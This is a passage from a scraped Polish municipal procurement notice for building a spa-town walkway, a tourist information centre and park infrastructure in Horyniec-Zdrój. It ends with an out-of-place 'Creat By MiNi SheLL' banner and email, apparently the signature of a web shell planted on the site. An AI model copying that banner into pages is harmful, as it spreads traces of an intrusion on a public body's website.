art. 6b ust. 5 pkt 2 ustawy z dnia 9.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 4.	Zamawiający nie wyraża zgody na wnoszenie zabezpieczenia w formach, o których mowa w art. 148 ust. 2 pkt 1-3 ustawy Pzp. 5.	Zabezpieczenie wnoszone w pieniądzu wykonawca wpłaca przelewem na następujący rachunek bankowy: Urząd Gminy Horyniec-Zdrój Bank Spółdzielczy w Lubaczowie Oddział w Horyńcu Nr 32 9101 1039 2002 2500 1195 0003Zabezpieczenie wnoszone w innej formie niż pieniądzu przekazane zostanie Zamawiającemu przez Wykonawcę w dniu podpisania umowy. 6.	W trakcie realizacji umowy Wykonawca może dokonać zmiany formy zabezpieczenia. Do zmiany formy zabezpieczenia umowy w trakcie realizacji umowy stosuje się art. 149 ustawy Pzp. 7.	Gwarancja bankowa, gwarancja ubezpieczeniowa, poręczenie bankowe oraz poręczenia innych instytucji winny zostać złożone w formie dokumentu oryginalnego. Dokument zabezpieczenia powinien być wystawiony na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie Zamawiającego. 8.	Zamawiający zwraca zabezpieczenie w terminie 30 dni od dnia wykonania zamówienia i uznania przez zamawiającego za należycie wykonane.9.	Kwota pozostawiona na zabezpieczenie roszczeń z tytułu rękojmi za wady wynosi 30% wysokości zabezpieczenia.Kwota, o której mowa w ust. 10, jest zwracana nie później niż w 15. dniu po upływie okresu rękojmi za wady. </span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron i wymaga formy pisemnej pod rygorem nieważności takiej zmiany w niżej przedstawionym zakresie:1. Zmiany terminu zakończenia robót budowlanych w przypadku:1) wystąpienia warunków atmosferycznych i zdarzeń losowych, które istotnie utrudniają lub uniemożliwiają prowadzenie robót,2) wprowadzenia zmian w dokumentacji techniczno-projektowej, co może powodować brak możliwości dotrzymania pierwotnego terminu zakończenia realizacji zawartej umowy,3) konieczności uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji danych, zgód, pozwoleń od osób trzecich lub właściwych organów. 2. W przypadku postanowień, które mają związek ze zmienionymi regulacjami prawnymi wprowadzonymi w życie po dacie podpisania umowy, wywołującymi potrzebę zmiany umowy. Zmiany wysokości podatku VAT.3. Zmiany w zakresie materiałów , parametrów technicznych, technologii wykonania , sposobu i zakresu wykonania umowy w przypadku:1) konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem umowy przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych niż wykazane w dokumentacji projektowej, a wynikających ze stwierdzonych wad tej dokumentacji,2) konieczności realizacji robót wynikających z wprowadzenia w dokumentacji projektowej zmian uznanych za nieistotne odstępstwo od projektu,3)wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych, odbiegających w sposób istotny od przyjętych w dokumentacji projektowej,a)	powstania konieczności wykonania zamówień dodatkowych, których wykonanie jest niezbędne dla wykonania przedmiotu Umowy,b)	zawieszenia robót przez organy nadzoru budowlanego z przyczyn niezależnych od Wykonawcy,c)	konieczność dostosowania wykonywanych prac do wymogów Konserwatora Zabytków dotyczy części III,4) wystąpienia warunków terenu odbiegających w sposób istotny od przyjętych w dokumentacji projektowej, w szczególności napotkanie niezinwentaryzowanych lub błędnie zinwentaryzowanych urządzeń podziemnych,5) konieczności zrealizowania przedmiotu umowy, przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu w szczególności na zmiany obowiązującego prawa, wystąpienia niebezpieczeństwa kolizji, z planowanymi lub równolegle prowadzonymi inwestycjami.4. Wymienione w ust.1-3 postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednak zobowiązania do wyrażenia takiej zgody.5. Wykonawca jest zobowiązany do prowadzenia bieżącej dokumentacji, koniecznej dla uzasadnienia żądanej zmiany.6. Wniosek w sprawach o których mowa w ust. 1-3 Wykonawca winien przekazać Zamawiającemu niezwłocznie, jednakże nie później niż 14 dni roboczych od dnia w którym Wykonawca dowiedział się o danym zdarzeniu lub okolicznościach.7. W terminie 7 dni roboczych od dnia otrzymania wniosku o którym mowa w ust.6 Zamawiający powiadomi Wykonawcę o akceptacji żądania zmiany umowy i terminie podpisania aneksu do umowy lub odpowiednio o braku akceptacji zmiany.8. Dopuszcza się zmianę postanowień zawartej umowy w przypadku zaistnienia okoliczności opisanych w art. 142 pkt 5 ustawy Prawo zamówień publicznych</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-08-06</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Budowa traktu turystyczno-spacerowego w dzielnicy uzdrowiskowej.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>2.	Stan istniejący:Ciąg pieszy turystyczno spacerowy projektuje się na terenie działek o numerach ewid. 218/16, 226/48, 226/5, 226/7, 474/1, które zlokalizowane są w miejscowości Horyniec-Zdrój na terenie równinnym, niezabudowanym, naturalnie ukształtowanym. Działki przeznaczone pod planowaną inwestycję stanowią gruntu klasy IVa i IVb sklasyfikowane jako gleby orne średniej jakości i gorszej. Obecnie porośnięte są trawami.3. Projektowane zmiany zagospodarowania terenuCiąg pieszy turystyczno - spacerowy projektuje się na działkach o nr ewid. 218/16, 226/48, 226/5, 226/7 z włączeniem do działki o nr ewid. 474/1 (droga powiatowa).Projektuje się n.w. elementy ciągu pieszego:1.	Odcinka drogi wewnętrznej i chodnika z kostki brukowej oraz parkingu z płyt ażurowych przy drodze wewnętrznej, chodnika z kostki brukowej przy drodze wewnętrznej o powierzchni F=1.227,15 m22.	Ciągu pieszego turystyczno - spacerowego z chodnikiem z kostki granitowej oraz ścieku przy ścieżce przyrodniczo - edukacyjnej i chodniku. Powierzchnia zabudowy F=2.163,35 m23.	Ciągu pieszego turystyczno - spacerowego z chodnikiem z kostki granitowej i płyt granitowych ze ściekiem. Powierzchnia zabudowy: F=11.126,51 m24.	Utwardzenia części działki z kostki granitowej: Powierzchnia F=2115,80 m25.	Kontener sanitarny. Powierzchnia zabudowy: F=15,00 m26.	Tężnie solankowe 2 szt z terenem utwardzonym przy tężniach.: Powierzchnia zabudowy fundamentów F= 52,80 m27.	Altany parkowe - szt.2 - pow zabudowy - 19,20 m28.	Wiaty wypoczynkowe - szt.2 - pow zabudowy - 24,00 m29.	Utwardzenie terenu - dojścia do altan i wiat - pow zabudowy - 78,80 m210.	Poidełka wody mineralnej siarczkowej - 2 szt11.	Przyłącz wody mineralnej siarczkowej zasilający projektowane poidełka wody P1 i P2 12.	z rur PE?40x2,4; długość L=399,40 m.13.	Przyłącza kanalizacyjne odprowadzające wody mineralne siarczkowe z przelewu projektowanych poidełek wody P1 i P2 z rur PVC?160x4,0; długość L=4,70 m i L=4,40 m. 14.	Zbiorniki bezodpływowe PE o pojemności V=2,0 m315.	Studzienki betonowe ?1000 z zaworami spustowymi - 2 szt.16.	Część mokrej fontanny posadzkowej. Powierzchnia zabudowy: F=64,00 m217.	Włazy do podziemnej części technicznej fontanny posadzkowej. Powierzchnia zabudowy: F= 1,80 m218.	Mur wykonany z kamienia pod tablice informacyjne na ścieżce przyrodniczo - edukacyjnej 6 szt. Powierzchnia zabudowy: F= 5,40 m219.	Fundamenty pod słupy lamp oświetlenia terenu 69 szt. Powierzchnia zabudowy: F =6,20 m220.	Postumenty betonowe pod szafki elektryczne 3 szt. Powierzchnia zabudowy: F= 0,50 m2Elementy małej architektury na terenie zielonym: 1)	Powierzchnia zabudowy sofami pojedynczymi gabionowymi 70 szt.: F= 108,50 m22)	Powierzchnia zabudowy pod kwietniki 4-kątne gabionowe 2 szt. + 1szt ławka gabionowa - 20 szt.: F= 42,00 m2 Elementy uzbrojenia terenu na terenie zielonym:?	Właz żeliwny studzienki inspekcyjnej kanalizacji sanitarnej ?425 - szt. 30 ?	Właz żeliwny studzienki inspekcyjnej odwodnienia ciągu pieszego ?425 - szt. 29 3)	Właz żeliwny ?600 do studzienki wodomierzowej szt. 24)	Hydranty 6 szt. i skrzynki żeliwne zasuwObiekty budowlane zlokalizowane na utwardzonej części działki:1)	Wpust żeliwny na studzience osadnikowej ?425 - szt. 252)	Wpust żeliwny na studzience osadnikowej z rurą wznośną PVC ?425 - szt, 28; F=7,00m23)	Właz ?600 zbiorników solanki - szt. 2 4)	Właz studzienki technicznej przy tężniach solnych: F=0,40m213. Elementy małej architektury projektowane na ciągu pieszym, utwardzeniu części działki kostką granitową i chodniku z kostki brukowej i granitoweja)	kwietnik 12-kątny gabionowy - 1 sztb)	ławka gabionowa wokół kwietnika - 1 sztc)	kwietnik 4-kątny gabionowe 2 szt + 1 szt ławka gabionowa - 20 sztd)	kwietnik 6-kątny gabionowy 3 szt + 2 szt ławki gabionowe - 6 szte)	kwietnik 6-kątny gabionowe 2 szt + 1 szt ławka gabionowa - 3 sztf)	ławka - konstrukcja ze stali nierdzewnej satynowej, siedzisko z dębowych elementów drewnianych - 51 sztg)	ławka z oparciem - konstrukcja ze stali nierdzewnej satynowej, siedzisko z dębowych elementów drewnianych - 18 szth)	kosz -konstrukcja ze stali nierdzewnej satynowej, dębowe elementy drewniane pojemnik - 73szti)	donica - konstrukcja ze stali nierdzewnej satynowej, dębowe elementy drewniane - 39 sztj)	podłogowa zewnętrzna lampa wpuszczana led na terenie utwardzonym kostką granitową -30 szt14. Urządzenia siłowni plenerowej na utwardzonej części działki z kostki granitowejbiegacz z pylonem 2-stanowiskowyławka pozioma z pylonem 1-stanowiskowaduże koło obrotowe z pylonem 1-stanowiskowewyciskanie w pozycji siedzącej z pylonem 1-stanowiskoweorbitek z pylonem 1-stanowiskowyexpander z pylonem 1-stanowiskowyPrzłączaWodociąg Likwidacja odcinka wodociągu wo110-długość L=58,00 mproj. PE?110; długość L=56,80 mproj. PE?90; długość L=574,50 mproj. PE?40; długość L=197,10 mproj. PE?32; długość L=20,30 m Razem L= 848,70m Kanalizacja sanitarna1.	proj. PVC?200; długość L=819,50 mo	proj. PVC?160; długość L=35,70 m Razem L=855,20mKanalizacja odwodnienia ciągu pieszego?	proj. PVC?400; długość L=417,80 m?	proj. PVC?315; długość L=379,70 m?	proj. PVC?250; długość L=116,70 m?	proj. PVC?160; długość L=70,20 m Razem L= 984,40mPrzyłącza wodociągowy	PE?32x2,0; L=64,20 mPrzyłacz kanalizacji sanitarnej PVC?160x4,0; L=23,60 mPrzyłącz kanalizacji deszczowej PVC?160x4,0; L=5,70 mBilans działek Ciąg pieszy turystyczno - spacerowyDziałka nr ewid.: 218/16, powierzchnia: F= 3569 m2,Działka nr ewid.: 226/48, powierzchnia: F=30858 m2 Działka nr ewid.: 226/5, powierzchnia: F=3364 m2 Działka nr ewid.: 226/7, powierzchnia: F=3225 m2	Łącznie powierzchnia działek: F= 41.016,00 m24. Wymagania dotyczące osób trzecich Sposób zagospodarowania działek nie naruszy interesów osób trzecich. Nie powoduje ograniczenia dostępu do drogi publicznej, nie pozbawia możliwości korzystania z wody, kanalizacji sanitarnej, gazu i energii elektrycznej, cieplnej, środków łączności. Inwestycja ta nie pozbawia dopływu światła dziennego do pomieszczeń przeznaczonych na stały pobyt ludzi, jest nie uciążliwa i nie powoduje zanieczyszczenia powietrza wody i gleby.5. Oddziaływanie górnicze Działki o nr ewid. 218/16, 226/48, 226/5, 226/7, 474/1 nie są położone na terenie górniczym.6. Warunki dziedzictwa kulturowego i zabytków oraz dóbr kulturyTeren, na którym projektowane są w.w. obiekty nie są wpisane do rejestru zabytków oraz nie są położone w strefie ochrony dziedzictwa kulturowego i zabytków oraz dóbr kultury współczesnej.Planowana inwestycja znajduje się na obszarze Natura 2000 Dyrektywa Ptasia PLB060012 Roztocze, Południoworoztoczańskim Parku Krajobrazowym i w strefie A ochrony uzdrowiskowej.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45200000-9, 45316110-9, 45233222-1, 45212140-9, 45330000-9, 45233161-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-06<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Przedłużenie okresu gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Budowa Centrum Informacji Turystycznej.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>2. Stan istniejącyNa działkach o nr ewid. 474/2 i 1138/1 wykonane są fundamenty betonowe w kształcie ośmiokąta.3. Projektowane zmiany zagospodarowania terenuBudynek Centrum Informacji Turystycznej projektuje się na istniejących fundamentach zlokalizowanych na działkach o nr ewid. 474/2 i 1138/1. Jest to budynek murowany z dachem konstrukcji drewnianej pokryty blachodachówką w kolorze istniejącego pokrycia zadaszonego wejścia do tunelu. Powierzchnia zabudowy budynkiem wynosi 44,30 m2Przyłącz wodociągowyNa działkach o nr ewid. 901/1 i 474/2 zaprojektowano przyłącz wodociągowy z rur PE?32x2,0; długość L=64,20 m. Przyłącz kanalizacji sanitarnejNa działkach o nr ewid. 901/1, 474/1, 474/2 zaprojektowano przyłącz kanalizacji sanitarnej z rur PVC?160x4,0; długość L=23,70 m. Przyłącz kanalizacji sanitarnej zaprojektowano włączyć do istniejącej studzienki kanalizacyjnej o rzędnej włazu 254,79 m n.p.m. i rzędnej dna 252,41 m n.p.m., oznaczonejw części graficznej S1 na działce o nr ewid. 901/1.Przyłącz kanalizacji deszczowejNa działce o nr ewid. 474/1, 474/2 i 1138/1 zaprojektowano przyłącz kanalizacji deszczowej z rur PVC-U, klasy N (SDR 41, SN4)o średnicy PVC?160x4,0; długość L=5,70 m. Przyłącz kanalizacji deszczowej zaprojektowano włączyć do istniejącej studzienki kanalizacyjnej o rzędnej włazu 255,20 m n.p.m. i rzędnej dna 252,85 m n.p.m., oznaczonejw części graficznej D1.Bilans działek Centrum Informacji TurystycznejDziałka nr ewid. 474/2 powierzchnia: F= 85 m2Działka nr ewid. 1138/1 powierzchnia: F=207 m2<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45000000-7, 45211350-7, 45211350-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-06<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Przedłużenie okresu gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Uzupełnienie infrastruktury w zabytkowym Parku Zdrojowym</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>2. Stan istniejącyW stanie istniejącym:-	Konstrukcja kładki stalowa. Dylina oraz słupki i wypełnienie barierek drewniane. Elementy drewniane kładki zniszczone. Nie nadają się do dalszego użytkowania.-	Istniejący plac zabaw o nawierzchni z gruntu rodzimego obsiany trawą. Na terenie placu zabaw zainstalowane są nowe urządzenia.3. Projektowane zmiany zagospodarowania terenu Projektuje się:3.1.	przebudowę kładki nad potokiem Papiernia -powierzchnia zabudowy - 19,62 m23.2.	ścieżkę zdrowia od strony północnej wzdłuż urządzonej alejki spacerowej biegnącej równolegle do potoku Papiernia. Powierzchnia utwardzenia pod montaż urządzeń ogółem: 226,75 m23.3.	budowę nawierzchni bezpiecznej na istniejącym placu zabaw - powierzchnia zabudowy 460,00 m24. Wymagania dotyczące osób trzecich Sposób zagospodarowania działek nie naruszy interesów osób trzecich. Nie powoduje ograniczenia dostępu do drogi publicznej, nie pozbawia możliwości korzystania z wody, kanalizacji sanitarnej, gazu i energii elektrycznej, cieplnej, środków łączności. Inwestycja ta nie pozbawia dopływu światła dziennego do pomieszczeń przeznaczonych na stały pobyt ludzi, jest nie uciążliwa i nie powoduje zanieczyszczenia powietrza wody i gleby.5. Oddziaływanie górnicze Działki o nr ewid. 1359/2, 1740/1,1861/1 nie są położone na terenie górniczym.6. Warunki ochrony dziedzictwa kulturowego i zabytków oraz dóbr kultury współczesnejPark Zdrojowy w Horyńcu-Zdroju wpisany jest do rejestru zabytków pod Nr rej.A-548 z dnia 08.04.1993 powstał w 1920 r.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45112723-9, 45233200-1, 45221113-7, 45212140-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-06<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Przedłużenie okresu gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com